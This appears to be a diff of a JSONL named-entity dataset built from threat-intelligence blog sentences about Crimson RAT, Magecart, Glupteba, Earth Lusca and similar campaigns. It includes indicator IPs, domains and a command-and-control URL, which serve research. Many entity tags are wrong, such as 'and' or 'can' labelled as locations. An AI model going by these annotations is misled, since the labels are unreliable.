attackers, including those from Iran and North Korea, impersonating news outlets or journalists.","entities":[{"id":21584,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":21587,"label":"location","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} +{"id":1513,"text":" \"dns.po888.com|122.228.242.51|119.145.148.56|162.221.13.82\".","entities":[{"id":46781,"label":"DOMAIN","start_offset":2,"end_offset":15},{"id":46782,"label":"IPV4","start_offset":16,"end_offset":30},{"id":46783,"label":"IPV4","start_offset":31,"end_offset":45},{"id":46784,"label":"IPV4","start_offset":46,"end_offset":59}],"relations":[],"Comments":[]} +{"id":3216,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} +{"id":3828,"text":"Variable}.WMI.createProcess Creates specified process {Variable}.shell File\/Process Execution functions {Variable}.shell.run Run commands {Variable}.shell.exec Executes process {Variable}.file File-related functions {Variable}.file.getPath Get specified file path {Variable}.file.readText Reads specified text file {Variable}.file.get32BitFolder Get System Folder (32\/64-bit) {Variable}.file.writol Writes on specified file {Variable}.file.deleteFile Deletes specified file {Variable}.file.readBinary Reads specified binary file. Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":3111,"text":" The greatest area of risk is in shared-hosting scenarios.","entities":[],"relations":[],"Comments":[]} +{"id":6938,"text":" Figure 3. An example of a coronavirus-related spear-phishing email attachment Once the victim downloads the malicious macro, it will decrypt an embedded executable dropper that is hidden inside a text box, which will then be saved to a hardcoded path prior to it executing in the machine. Figure 4. Malicious macro that decrypts an executable hidden inside a text box Figure 5. Examples of encrypted Crimson RAT executables hidden inside text boxes Once the executable file is executed, it will proceed to unzip a file named mdkhm.zip and then execute a Crimson RAT executable named dlrarhsiva.exe.","entities":[{"id":21716,"label":"location","start_offset":52,"end_offset":57},{"id":21717,"label":"attack-pattern","start_offset":58,"end_offset":66},{"id":21718,"label":"location","start_offset":138,"end_offset":142},{"id":21719,"label":"location","start_offset":222,"end_offset":226},{"id":21722,"label":"malware","start_offset":420,"end_offset":431},{"id":21723,"label":"location","start_offset":514,"end_offset":518},{"id":21724,"label":"location","start_offset":559,"end_offset":562},{"id":21725,"label":"malware","start_offset":578,"end_offset":589}],"relations":[],"Comments":[]} +{"id":8339,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} +{"id":11586,"text":"In collaboration with TAG, Project Zero has published the technical analysis of CVE-2021-30983.","entities":[],"relations":[],"Comments":[]} +{"id":4856,"text":"This hack-for-hire actor has been publicly referred to as 'Void Balaur'.","entities":[{"id":50838,"label":"attack-pattern","start_offset":5,"end_offset":18},{"id":14831,"label":"threat-actor","start_offset":59,"end_offset":70}],"relations":[],"Comments":[]} +{"id":2247,"text":"When the previously mentioned C2 response is both decoded and decrypted, we are presented with the following data: The command structure of the C2 response always begins with the string \u2018tick\u2019","entities":[],"relations":[],"Comments":[]} +{"id":217,"text":"The .onion site links to an entity calling themselves \u201cFree Civilian\u201d and offering to sell databases containing the personal data of Ukrainian citizens.","entities":[],"relations":[],"Comments":[]} +{"id":1936,"text":" Urpage Bahamut Confucius Patchwork \"BioData\" Delphi backdoor and file stealer X X X VB backdoor X Android \"Bahamut-like\" malware X X X Custom Android malware X AndroRAT Android malware X InPage malicious documents X X simply obfuscated HTA downloaders X X IOS malware X Confucius malware X remote-access-c3 backdoor X Sneepy\/Byebye shell malware X Python cloud filestealers X AllaKore RAT X Badnews malware X QuasarRAT X NDiskMonitor malware X Targets","entities":[{"id":5685,"label":"threat-actor","start_offset":3,"end_offset":9},{"id":5686,"label":"threat-actor","start_offset":10,"end_offset":17},{"id":5687,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":5688,"label":"threat-actor","start_offset":28,"end_offset":37},{"id":5689,"label":"malware","start_offset":39,"end_offset":46},{"id":5693,"label":"malware","start_offset":118,"end_offset":125},{"id":5694,"label":"malware","start_offset":179,"end_offset":187},{"id":5695,"label":"threat-actor","start_offset":309,"end_offset":318},{"id":5697,"label":"malware","start_offset":369,"end_offset":375},{"id":5700,"label":"malware","start_offset":439,"end_offset":451},{"id":5701,"label":"malware","start_offset":460,"end_offset":467},{"id":5702,"label":"malware","start_offset":484,"end_offset":493},{"id":5703,"label":"malware","start_offset":502,"end_offset":514},{"id":47059,"label":"SOFTWARE","start_offset":155,"end_offset":162},{"id":47060,"label":"malware","start_offset":376,"end_offset":382}],"relations":[],"Comments":[]} +{"id":410,"text":" This surge in unauthorized coin mining is driven, in large part, by the recent skyrocketing in the value of digital currencies like bitcoin.","entities":[{"id":46107,"label":"SOFTWARE","start_offset":133,"end_offset":140},{"id":46108,"label":"attack-pattern","start_offset":15,"end_offset":39}],"relations":[],"Comments":[]} +{"id":3804,"text":"Auto Update","entities":[],"relations":[],"Comments":[]} +{"id":14316,"text":"Code snippets of the scanning, fetching, and uploading of .jpg, .jpeg, .png, .txt, .wav, .html, .doc, .docx and .rtf files (left).","entities":[],"relations":[],"Comments":[]} +{"id":2960,"text":"The faster the good guys track these down and get them patched, the harder we make the lives of the criminals looking to exploit them.","entities":[],"relations":[],"Comments":[]} +{"id":261,"text":"We also found that these fake download campaigns rotate domains to distribute the same malicious binaries.","entities":[{"id":44664,"label":"attack-pattern","start_offset":25,"end_offset":38},{"id":44665,"label":"attack-pattern","start_offset":87,"end_offset":105}],"relations":[],"Comments":[]} +{"id":14107,"text":"Screenshot functionality comparison between SLUB and APT37 Working Hours","entities":[{"id":43645,"label":"malware","start_offset":44,"end_offset":48},{"id":43647,"label":"threat-actor","start_offset":53,"end_offset":58}],"relations":[],"Comments":[]} +{"id":2780,"text":"The tool is designed to \u201cmine\u201d cryptocurrencies, that is it earns credit in the cryptocurrency in exchange for computing power that is used to power the cryptocurrencies\u2019 digital infrastructure.","entities":[],"relations":[],"Comments":[]} +{"id":139,"text":"In our updated report on ransomware from Unit 42, \u201cRansomware: Unlocking the Lucrative Criminal Business Model,\u201d Unit 42 researcher Bryan Lee notes: \u201cIn 2016, it was thought that there were less than one hundred active ransomware variants out in the wild.","entities":[{"id":45846,"label":"identity","start_offset":41,"end_offset":48},{"id":45847,"label":"TIME","start_offset":153,"end_offset":157},{"id":45844,"label":"identity","start_offset":113,"end_offset":120},{"id":45845,"label":"identity","start_offset":132,"end_offset":141}],"relations":[],"Comments":[]} +{"id":4056,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":4041,"text":" Figure 2. Timestomping used on the bin file The decryption key is used as an argument of Nerapack and various keys are used on different victims.","entities":[{"id":49893,"label":"malware","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} +{"id":2322,"text":"After the WebKit RCE succeeds, an embedded Mach-O binary is loaded into memory, patched, and run.","entities":[{"id":47397,"label":"SOFTWARE","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} +{"id":13488,"text":"These channels were mostly uploading spammy, non-political content, but a small subset posted primarily Chinese-language political content similar to the findings of a recent Graphika report.","entities":[],"relations":[],"Comments":[]} +{"id":3634,"text":"Rather than simply using a theme or lure that is relevant to the target, the attackers behind these attacks use an email conversation that\u2019s in progress to carry out their attack.","entities":[],"relations":[],"Comments":[]} +{"id":13270,"text":"Figure 7.","entities":[],"relations":[],"Comments":[]} +{"id":6084,"text":"The loader can be recognized by its use of a unique user-agent \u201cbumblebee\u201d which both variants share.","entities":[{"id":18780,"label":"location","start_offset":11,"end_offset":14},{"id":18781,"label":"malware","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} +{"id":1816,"text":"Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.","entities":[{"id":46933,"label":"SOFTWARE","start_offset":24,"end_offset":46}],"relations":[],"Comments":[]} {"id":5542,"text":"Developing new skimming code which is usable across as many different payment pages as possible.","entities":[{"id":51538,"label":"attack-pattern","start_offset":15,"end_offset":28}],"relations":[],"Comments":[]} -{"id":5543,"text":"The record is 57 different payment gateways, which makes the hackers’ job much easier as they can launch attack campaigns across the globe with the same tools All this is bad news for online shoppers.","entities":[],"relations":[],"Comments":[]} -{"id":5544,"text":"So how do you know that the site you’re entering card data into is safe?","entities":[],"relations":[],"Comments":[]} -{"id":5545,"text":"What can you do to stay safe?","entities":[],"relations":[],"Comments":[]} -{"id":5546,"text":"Unfortunately, there’s nothing obvious that differentiates a website infected with Magecart from any other site.","entities":[{"id":51539,"label":"malware","start_offset":83,"end_offset":91}],"relations":[],"Comments":[]} -{"id":5547,"text":"It will look completely normal and will allow you to pay in the usual manner.","entities":[],"relations":[],"Comments":[]} -{"id":5548,"text":"The only difference is that, in the background, a tiny piece of code will be stealing your data and transferring it to the hackers.","entities":[],"relations":[],"Comments":[]} -{"id":5549,"text":"So what can you do to protect yourself?","entities":[],"relations":[],"Comments":[]} -{"id":5550,"text":" You could try to avoid smaller sites that may not have the same level of security as larger ones.","entities":[],"relations":[],"Comments":[]} -{"id":5551,"text":"However, as we’ve seen, Magecart has hit big-name brands as well as less well-known companies.","entities":[{"id":51540,"label":"malware","start_offset":24,"end_offset":32}],"relations":[],"Comments":[]} -{"id":5552,"text":"Another option would be to use a browser plug-in like NoScript for Firefox that prevents JavaScript loading from other untrusted sites – although this won’t prevent you getting potentially stung if the well-known and trusted site you’re on is compromised","entities":[{"id":51541,"label":"SOFTWARE","start_offset":54,"end_offset":74}],"relations":[],"Comments":[]} -{"id":5553,"text":"Payment systems like Apple Pay and Google Pay can offer more protection.","entities":[{"id":51542,"label":"SOFTWARE","start_offset":21,"end_offset":30},{"id":51543,"label":"SOFTWARE","start_offset":35,"end_offset":45}],"relations":[],"Comments":[]} -{"id":5554,"text":"They use a one-time generated series of numbers for each transaction, so that if attackers get their hands on it, they won’t be able to use it in the future.","entities":[],"relations":[],"Comments":[]} -{"id":5555,"text":" It goes without saying that you should keep a close eye on your card statements\/bank account at all times – watching out even for small amounts that hackers may be making to test if your card is still active.","entities":[],"relations":[],"Comments":[]} -{"id":5556,"text":" However, the most effective way to stay safe is to use Trend Micro Security.","entities":[],"relations":[],"Comments":[]} -{"id":5557,"text":" How Trend Micro can help Trend Micro Security features two key mechanisms to help stop Magecart attacks:","entities":[{"id":51773,"label":"malware","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} -{"id":5558,"text":" It can detect whether the website you want to visit has been injected with skimming code, and block you from visiting the URL (via web reputation), as well as from going to malicious domains the skimming code has access to.","entities":[],"relations":[],"Comments":[]} -{"id":5564,"text":"Cyber Crime | Expert Perspective | Cyber Threats","entities":[],"relations":[],"Comments":[]} -{"id":5570,"text":"REvil","entities":[{"id":17139,"label":"threat-actor","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} -{"id":5571,"text":"While the disappearance of REvil (aka Sodinokibi) in mid-2021 is filled with uncertainty, security researchers have found a Linux version of the REvil ransomware that they have dubbed as Revix.","entities":[{"id":17140,"label":"threat-actor","start_offset":27,"end_offset":32},{"id":17141,"label":"threat-actor","start_offset":38,"end_offset":48},{"id":17143,"label":"location","start_offset":90,"end_offset":98}],"relations":[],"Comments":[]} -{"id":5572,"text":"After analyzing the samples, we found four different versions of the malware, all of which rely on an embedded JavaScript Observed Notation (JSON)-based configuration to set parameters before encrypting files.","entities":[],"relations":[],"Comments":[]} -{"id":5573,"text":" Figure 1. Revix’s JSON-based configuration ","entities":[],"relations":[],"Comments":[]} -{"id":5575,"text":" Figure 2. Revix encrypting a QNAP NAS device Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":5576,"text":"Revix","entities":[],"relations":[],"Comments":[]} -{"id":5580,"text":"StealthWorker","entities":[],"relations":[],"Comments":[]} -{"id":5585,"text":"StealthWorker","entities":[],"relations":[],"Comments":[]} -{"id":5587,"text":" Figure 5. Infected Linux device connected to a C&C server ","entities":[],"relations":[],"Comments":[]} -{"id":5588,"text":"How to protect NAS devices","entities":[],"relations":[],"Comments":[]} -{"id":5590,"text":"Here are some best practices to protect your systems against threats that leverage the gaps in your NAS devices: ","entities":[{"id":17191,"label":"location","start_offset":5,"end_offset":8},{"id":17192,"label":"location","start_offset":14,"end_offset":18},{"id":17193,"label":"malware","start_offset":74,"end_offset":82}],"relations":[],"Comments":[]} -{"id":5591,"text":"Avoid connecting a NAS device directly to the internet.","entities":[],"relations":[],"Comments":[]} -{"id":5592,"text":"Regularly change the credentials for accessing an NAS device.","entities":[],"relations":[],"Comments":[]} -{"id":5598,"text":"On April 21st our WildFire analysis cloud detected a new Android Trojan, which is currently completely undetected in VirusTotal and uses a new combination of tactics to make money for the author.","entities":[{"id":17212,"label":"tools","start_offset":18,"end_offset":26},{"id":17213,"label":"location","start_offset":36,"end_offset":41},{"id":17215,"label":"location","start_offset":128,"end_offset":131},{"id":17216,"label":"location","start_offset":174,"end_offset":179}],"relations":[],"Comments":[]} -{"id":5603,"text":"Code analysis shows that this malware sample can defeat the existing multi-factor verification procedures of many popular game platforms or online payment systems, and impersonate the smartphone user in making the purchase.","entities":[{"id":17230,"label":"tools","start_offset":0,"end_offset":13},{"id":17231,"label":"location","start_offset":38,"end_offset":44},{"id":17232,"label":"location","start_offset":45,"end_offset":48},{"id":17233,"label":"location","start_offset":109,"end_offset":113},{"id":17234,"label":"location","start_offset":164,"end_offset":167},{"id":17235,"label":"location","start_offset":214,"end_offset":222}],"relations":[],"Comments":[]} -{"id":5613,"text":"The name is看片神器 which translates to “a super tool for watching videos” and the icon is a provocative photo.","entities":[{"id":17268,"label":"location","start_offset":45,"end_offset":49},{"id":17269,"label":"location","start_offset":71,"end_offset":74},{"id":17270,"label":"tools","start_offset":101,"end_offset":106}],"relations":[],"Comments":[]} -{"id":5616,"text":"Once launched, it contacts a command and control server hosted in China using an HTTP GET request to the following website to register the infection with the attacker: http:\/\/14.17.95.205:21910\/my\/service.php.","entities":[{"id":17280,"label":"location","start_offset":37,"end_offset":40},{"id":17282,"label":"location","start_offset":126,"end_offset":134},{"id":17283,"label":"URL","start_offset":168,"end_offset":208}],"relations":[],"Comments":[]} -{"id":5621,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":5623,"text":"UUDama uses a combination of machines and humans to quickly take CAPTCHA images submitted by Cardbuyer (or anyone else who will pay) and turn them into the expected text within 60 seconds.","entities":[{"id":17310,"label":"location","start_offset":38,"end_offset":41},{"id":17312,"label":"location","start_offset":123,"end_offset":127},{"id":17313,"label":"location","start_offset":133,"end_offset":136},{"id":17314,"label":"location","start_offset":142,"end_offset":146},{"id":17315,"label":"TIME","start_offset":177,"end_offset":187}],"relations":[],"Comments":[]} -{"id":5629,"text":"To avoid having this request rejected by the server, the Trojan alters its user-agent string to appear as Internet Explorer 9 running on Windows 7.","entities":[],"relations":[],"Comments":[]} -{"id":5630,"text":"Figure 4.","entities":[],"relations":[],"Comments":[]} -{"id":5633,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":5635,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":5637,"text":"The complicated user verification procedure continues.","entities":[],"relations":[],"Comments":[]} -{"id":5644,"text":"In Figure 8, we show the patterns for different types of SMS contents.","entities":[],"relations":[],"Comments":[]} -{"id":5648,"text":"From here the attacker can sell the code to someone else for cash, or redeem it directly. While in the example here Cardbuyer targeted the Tianxiafu service, all of the services listed above are targets already pre-defined in its source code.","entities":[{"id":17392,"label":"location","start_offset":23,"end_offset":26},{"id":17393,"label":"location","start_offset":61,"end_offset":65},{"id":17396,"label":"location","start_offset":192,"end_offset":195},{"id":17397,"label":"attack-pattern","start_offset":231,"end_offset":237}],"relations":[],"Comments":[]} -{"id":5649,"text":"Any service that uses SMS for authentication of information or proof that a user is authorizing a charge is vulnerable to Trojan attacks.","entities":[],"relations":[],"Comments":[]} -{"id":5651,"text":"Join us Wednesday, April 30 at 3 p.m. EDT, for a new webinar, “Need to Defeat APTs?","entities":[{"id":17404,"label":"TIME","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} -{"id":5654,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 2022.","entities":[],"relations":[],"Comments":[]} -{"id":5655,"text":"It was last updated on May 12, 2022.","entities":[],"relations":[],"Comments":[]} -{"id":5656,"text":"We have also taken extraordinary measures beyond our actions against coordinated influence operations to protect users and stop the spread of misinformation and disinformation about the war in Ukraine online.","entities":[{"id":17413,"label":"location","start_offset":119,"end_offset":122},{"id":17414,"label":"malware","start_offset":123,"end_offset":127},{"id":17415,"label":"location","start_offset":157,"end_offset":160},{"id":17416,"label":"location","start_offset":186,"end_offset":189}],"relations":[],"Comments":[]} -{"id":5658,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with the community to benefit the internet as a whole.","entities":[{"id":17421,"label":"tools","start_offset":48,"end_offset":54},{"id":17422,"label":"location","start_offset":55,"end_offset":58},{"id":17423,"label":"location","start_offset":59,"end_offset":67},{"id":17424,"label":"location","start_offset":84,"end_offset":87},{"id":17425,"label":"location","start_offset":121,"end_offset":130}],"relations":[],"Comments":[]} -{"id":5659,"text":"As announced today, Google has taken action to disrupt the operations of Glupteba, a multi-component botnet targeting Windows computers.","entities":[{"id":17428,"label":"location","start_offset":37,"end_offset":43},{"id":17429,"label":"malware","start_offset":73,"end_offset":81}],"relations":[],"Comments":[]} -{"id":5664,"text":"The Glupteba malware family is primarily distributed through pay per install (PPI) networks and via traffic purchased from traffic distribution systems (TDS).","entities":[{"id":17449,"label":"malware","start_offset":4,"end_offset":12},{"id":17450,"label":"location","start_offset":92,"end_offset":95}],"relations":[],"Comments":[]} -{"id":5665,"text":"For a period of time, we observed thousands of instances of malicious Glupteba downloads per day.","entities":[{"id":17451,"label":"location","start_offset":16,"end_offset":20},{"id":17453,"label":"malware","start_offset":70,"end_offset":78},{"id":17454,"label":"location","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} -{"id":5666,"text":"The following image shows a webpage mimicking a software crack download which delivers a variant of Glupteba to users instead of the promised software.","entities":[{"id":17455,"label":"malware","start_offset":100,"end_offset":108}],"relations":[],"Comments":[]} -{"id":5667,"text":"While analyzing Glupteba binaries, our team identified a few containing a git repository URL: “git.voltronwork.com”.","entities":[{"id":17456,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} -{"id":5668,"text":"This finding sparked an investigation that led us to identify, with high confidence, multiple online services offered by the individuals operating the Glupteba botnet.","entities":[{"id":17458,"label":"location","start_offset":73,"end_offset":83},{"id":17459,"label":"malware","start_offset":151,"end_offset":159}],"relations":[],"Comments":[]} -{"id":5670,"text":"This past year, TAG has been collaborating with Google’s CyberCrime Investigation Group to disrupt Glupteba activity involving Google services.","entities":[{"id":17466,"label":"malware","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} -{"id":5675,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":17489,"label":"location","start_offset":36,"end_offset":39},{"id":17493,"label":"malware","start_offset":179,"end_offset":187},{"id":17494,"label":"location","start_offset":195,"end_offset":198}],"relations":[],"Comments":[]} -{"id":5679,"text":"To add resilience to their infrastructure, the operators have also implemented a backup mechanism using the Bitcoin blockchain.","entities":[],"relations":[],"Comments":[]} -{"id":5682,"text":"Full details of Glupteba’s network protocol can be found in this report from 2020, the following Python script illustrates how one can decrypt an encrypted domain name:","entities":[{"id":17519,"label":"malware","start_offset":16,"end_offset":24},{"id":17520,"label":"location","start_offset":44,"end_offset":47},{"id":17522,"label":"location","start_offset":127,"end_offset":130},{"id":17523,"label":"location","start_offset":131,"end_offset":134}],"relations":[],"Comments":[]} -{"id":5684,"text":"Since mid-2021, we have been investigating a rather elusive threat actor called Earth Lusca that targets organizations globally via a campaign that uses traditional social engineering techniques such as spear phishing and watering holes.","entities":[{"id":17527,"label":"location","start_offset":134,"end_offset":142},{"id":17528,"label":"attack-pattern","start_offset":203,"end_offset":217},{"id":17529,"label":"location","start_offset":218,"end_offset":221}],"relations":[],"Comments":[]} -{"id":5687,"text":" Previous research into the group’s activities attributed it to other threat actors such as the Winnti group due to the use of malware such as Winnti, but despite some similarities, we consider Earth Lusca a separate threat actor (we do have evidence, however, that the group is part of the “Winnti cluster,” which is comprised of different groups with the same origin country and share aspects of their TTPs).","entities":[{"id":17540,"label":"malware","start_offset":292,"end_offset":298},{"id":17541,"label":"location","start_offset":357,"end_offset":361},{"id":17542,"label":"location","start_offset":377,"end_offset":380}],"relations":[],"Comments":[]} -{"id":5690,"text":"The first cluster is built using virtual private servers (VPS), rented from a service provider, that are used for the group’s watering hole and spear phishing operations, in addition to acting as a command-and-control (C&C) server for malware.","entities":[{"id":17551,"label":"location","start_offset":101,"end_offset":104},{"id":17552,"label":"location","start_offset":135,"end_offset":139},{"id":17553,"label":"location","start_offset":140,"end_offset":143},{"id":17554,"label":"attack-pattern","start_offset":144,"end_offset":158},{"id":17555,"label":"location","start_offset":206,"end_offset":209}],"relations":[],"Comments":[]} -{"id":5691,"text":"The second cluster is made up of compromised servers running old, open-source versions of Oracle GlassFish Server.","entities":[{"id":17557,"label":"location","start_offset":22,"end_offset":26},{"id":17558,"label":"attack-pattern","start_offset":71,"end_offset":77}],"relations":[],"Comments":[]} -{"id":5695,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":5696,"text":"An overview of Earth Lusca’s infrastructure Social Engineering and Vulnerability Exploitation techniques","entities":[{"id":17572,"label":"threat-actor","start_offset":15,"end_offset":26},{"id":17573,"label":"location","start_offset":68,"end_offset":71}],"relations":[],"Comments":[]} -{"id":5697,"text":"The group has three primary attack vectors, two of which involve social engineering.","entities":[],"relations":[],"Comments":[]} -{"id":5698,"text":"The social engineering techniques can be broken down into spear phishing emails and watering hole websites.","entities":[{"id":17576,"label":"location","start_offset":34,"end_offset":37},{"id":17577,"label":"attack-pattern","start_offset":58,"end_offset":72},{"id":17578,"label":"location","start_offset":80,"end_offset":83},{"id":17579,"label":"location","start_offset":93,"end_offset":97}],"relations":[],"Comments":[]} -{"id":5699,"text":"Our telemetry data shows Earth Lusca sending spear phishing emails containing malicious links to one of their targets — a media company.","entities":[{"id":17581,"label":"attack-pattern","start_offset":45,"end_offset":59},{"id":17583,"label":"location","start_offset":122,"end_offset":127}],"relations":[],"Comments":[]} -{"id":5701,"text":"The user eventually downloads an archive file containing either a malicious LNK file or an executable — eventually leading to a Cobalt Strike loader.","entities":[],"relations":[],"Comments":[]} -{"id":5702,"text":"In addition to spear phishing emails, Earth Lusca also made use of watering hole websites — they either compromised websites of their targets or set up fake web pages copied from legitimate websites and then injected malicious JavaScript code inside them.","entities":[{"id":17588,"label":"attack-pattern","start_offset":15,"end_offset":29},{"id":17590,"label":"location","start_offset":55,"end_offset":59},{"id":17591,"label":"location","start_offset":76,"end_offset":80},{"id":17592,"label":"location","start_offset":199,"end_offset":202},{"id":17593,"label":"location","start_offset":250,"end_offset":254}],"relations":[],"Comments":[]} -{"id":5705,"text":"This script was designed to show a social engineering message — typically a Flash update popup or a DNS error (note that Adobe discontinued Flash Player at the end of December 2020) that then instructed the visitor to download a malicious file that turned out to be a Cobalt Strike loader.","entities":[],"relations":[],"Comments":[]} -{"id":5706,"text":" Figure 2. Fake installation pop-up The third attack vector used by Earth Lusca is the exploitation of vulnerabilities that exist in the public-facing applications — such as Microsoft Exchange ProxyShell and Oracle GlassFish — of its targets.","entities":[{"id":17601,"label":"location","start_offset":33,"end_offset":36},{"id":17603,"label":"tools","start_offset":61,"end_offset":67},{"id":17604,"label":"threat-actor","start_offset":76,"end_offset":87},{"id":17605,"label":"location","start_offset":145,"end_offset":151},{"id":17607,"label":"location","start_offset":192,"end_offset":200},{"id":17609,"label":"location","start_offset":212,"end_offset":215}],"relations":[],"Comments":[]} -{"id":5707,"text":"Once these are accomplished, Earth Lusca is free to perform its post-exploitation routines that include installation of tools such as Cobalt Strike and Acunetix (we discuss the post-exploitation routines in detail in the technical brief).","entities":[{"id":17612,"label":"location","start_offset":11,"end_offset":14},{"id":17613,"label":"threat-actor","start_offset":29,"end_offset":40},{"id":17614,"label":"location","start_offset":64,"end_offset":68},{"id":17616,"label":"location","start_offset":148,"end_offset":151},{"id":17618,"label":"location","start_offset":177,"end_offset":181}],"relations":[],"Comments":[]} -{"id":5708,"text":"Malware used by Earth Lusca Earth Lusca employs several malware and other hacking tools in its arsenal.","entities":[{"id":17620,"label":"threat-actor","start_offset":28,"end_offset":39},{"id":17621,"label":"location","start_offset":64,"end_offset":67},{"id":17622,"label":"location","start_offset":95,"end_offset":102}],"relations":[],"Comments":[]} -{"id":5720,"text":"This post is also available in: 日本語 (Japanese) Unit 42 released details about a new spear phishing campaign called FreeMilk that uses a relatively new attack technique that can be highly effective.","entities":[{"id":17675,"label":"location","start_offset":5,"end_offset":9},{"id":17677,"label":"identity","start_offset":53,"end_offset":60},{"id":17678,"label":"attack-pattern","start_offset":90,"end_offset":104},{"id":17679,"label":"location","start_offset":105,"end_offset":113},{"id":17681,"label":"location","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} -{"id":5724,"text":" Phishing attacks are broad, leveraging email messages crafted around common, generalized topics in order to trick recipients into opening an email message and its attachments.","entities":[{"id":17688,"label":"attack-pattern","start_offset":1,"end_offset":9},{"id":17689,"label":"location","start_offset":18,"end_offset":21},{"id":17690,"label":"location","start_offset":156,"end_offset":159}],"relations":[],"Comments":[]} -{"id":5725,"text":"Attackers will cast a wide net, with no regard to who the victims are, hoping that a decent percentage of attacks are successful.","entities":[{"id":17691,"label":"location","start_offset":10,"end_offset":14},{"id":17692,"label":"identity","start_offset":15,"end_offset":19},{"id":17693,"label":"tools","start_offset":27,"end_offset":30},{"id":17694,"label":"location","start_offset":66,"end_offset":69},{"id":17695,"label":"location","start_offset":114,"end_offset":117}],"relations":[],"Comments":[]} -{"id":5726,"text":" Spear phishing, like the name implies, is a more targeted form of phishing which incorporates a theme directly related to the target.","entities":[{"id":17696,"label":"attack-pattern","start_offset":1,"end_offset":15},{"id":17697,"label":"attack-pattern","start_offset":67,"end_offset":75},{"id":17698,"label":"location","start_offset":127,"end_offset":133}],"relations":[],"Comments":[]} -{"id":5728,"text":" FreeMilk is an advanced spear phishing attack campaign that, instead of using a theme to lure targets into downloading a malicious attachment, hijacks an in-progress email conversation.","entities":[{"id":17705,"label":"attack-pattern","start_offset":25,"end_offset":39},{"id":17706,"label":"location","start_offset":47,"end_offset":55},{"id":17707,"label":"location","start_offset":90,"end_offset":94},{"id":17708,"label":"location","start_offset":158,"end_offset":166}],"relations":[],"Comments":[]} -{"id":5729,"text":"Simply explained: Figure 1 Conversation Hijacking to Deliver Malware Unit 42 observed this specific attack taking advantage of a vulnerability in Microsoft Office, which has a patch available.","entities":[{"id":17711,"label":"identity","start_offset":148,"end_offset":157}],"relations":[],"Comments":[]} -{"id":5735,"text":"Also, read about a data breach from IoT company Wyze that exposed information of 2.4 million customers.","entities":[],"relations":[],"Comments":[]} -{"id":5736,"text":"Read on:","entities":[],"relations":[],"Comments":[]} -{"id":5745,"text":"Cambridge Analytica Scandal: Facebook Hit with $1.6 Million Fine","entities":[{"id":17780,"label":"identity","start_offset":38,"end_offset":41},{"id":17782,"label":"location","start_offset":60,"end_offset":64}],"relations":[],"Comments":[]} -{"id":5746,"text":"The Cambridge Analytica scandal continues to haunt Facebook.","entities":[],"relations":[],"Comments":[]} -{"id":5749,"text":"Why Running a Privileged Container in Docker is a Bad Idea","entities":[],"relations":[],"Comments":[]} -{"id":5752,"text":"IoT Company Wyze Leaks Emails, Device Data of 2.4M","entities":[],"relations":[],"Comments":[]} -{"id":5759,"text":"The new research expands on previous work into an attack vector known as Rowhammer, first detailed in 2014 Emotet Attack Causes Shutdown of Frankfurt’s IT Network","entities":[{"id":17835,"label":"tools","start_offset":57,"end_offset":63},{"id":17837,"label":"tools","start_offset":107,"end_offset":113}],"relations":[],"Comments":[]} -{"id":5760,"text":"The city of Frankfurt, Germany, became the latest victim of Emotet after an infection forced it to close its IT network.","entities":[{"id":17841,"label":"malware","start_offset":60,"end_offset":66}],"relations":[],"Comments":[]} -{"id":5764,"text":"Greg Young, vice president of cybersecurity at Trend Micro, discusses BeyondProd’s value in this article.","entities":[],"relations":[],"Comments":[]} -{"id":5765,"text":"How MITRE ATT&CK Assists in Threat Investigation","entities":[],"relations":[],"Comments":[]} -{"id":5767,"text":"In this analysis, Trend Micro investigates an incident involving the MyKings botnet to show how the MITRE ATT&CK framework helps with threat investigation.","entities":[],"relations":[],"Comments":[]} -{"id":5774,"text":"Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.","entities":[],"relations":[],"Comments":[]} -{"id":5776,"text":"Jon Clay, VP of Threat Intelligence: [00:00:00","entities":[],"relations":[],"Comments":[]} -{"id":5779,"text":"Joining me again is my cohort in crime.","entities":[],"relations":[],"Comments":[]} -{"id":5780,"text":"Ed Cabrera, Chief Cybersecurity Officer:","entities":[],"relations":[],"Comments":[]} -{"id":5781,"text":"My name's Ed Cabrera.","entities":[],"relations":[],"Comments":[]} -{"id":5782,"text":"I'm the Chief Cybersecurity Officer at Trend Micro.","entities":[],"relations":[],"Comments":[]} -{"id":5783,"text":"It’s great to be here.","entities":[],"relations":[],"Comments":[]} -{"id":5784,"text":"Jon:","entities":[],"relations":[],"Comments":[]} -{"id":5789,"text":"But we didn't cover a number of areas that I thought we were going to cover, but we didn't.","entities":[],"relations":[],"Comments":[]} -{"id":5790,"text":"So I thought you and I [00:01:00] could take time today and talk a little bit about cyber warfare, hybrid 